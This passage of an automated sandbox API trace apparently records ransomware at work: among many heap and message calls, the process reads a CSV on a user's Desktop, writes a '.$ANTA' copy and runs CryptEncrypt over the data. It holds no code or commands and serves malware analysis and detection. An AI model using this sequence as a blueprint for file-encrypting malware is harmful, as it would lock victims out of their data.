lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0120.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0120.779] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0120.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9578 [0120.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0120.780] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0120.780] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.780] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aYyiLdyhoIdALfth0-Sh.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\ayyildyhoidalfth0-sh.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0120.780] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.780] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.781] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0120.781] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d8c0 | out: hHeap=0x1780000) returned 1 [0120.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.782] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43924c8 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0120.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.782] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aYyiLdyhoIdALfth0-Sh.csv.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ayyildyhoidalfth0-sh.csv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.783] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0120.783] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.786] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0120.787] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x97a6, lpOverlapped=0x0) returned 1 [0120.789] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0120.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0d020 | out: hHeap=0x1780000) returned 1 [0120.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.794] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.794] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.794] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.795] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0120.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0120.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0120.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.796] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0120.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.796] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.796] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0120.796] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2770, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2770*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0120.797] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.797] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.797] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.797] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0120.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0120.798] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x97a6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x97b0) returned 1 [0120.798] CharLowerBuffW (in: lpsz="byte[38833]", cchLength=0xb | out: lpsz="byte[38833]") returned 0xb [0120.799] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.799] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0120.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caeb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0120.800] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49c6720*, pdwDataLen=0x144e790*=0x97a6, dwBufLen=0x97b0 | out: pbData=0x49c6720*, pdwDataLen=0x144e790*=0x97b0) returned 1 [0120.800] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.800] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 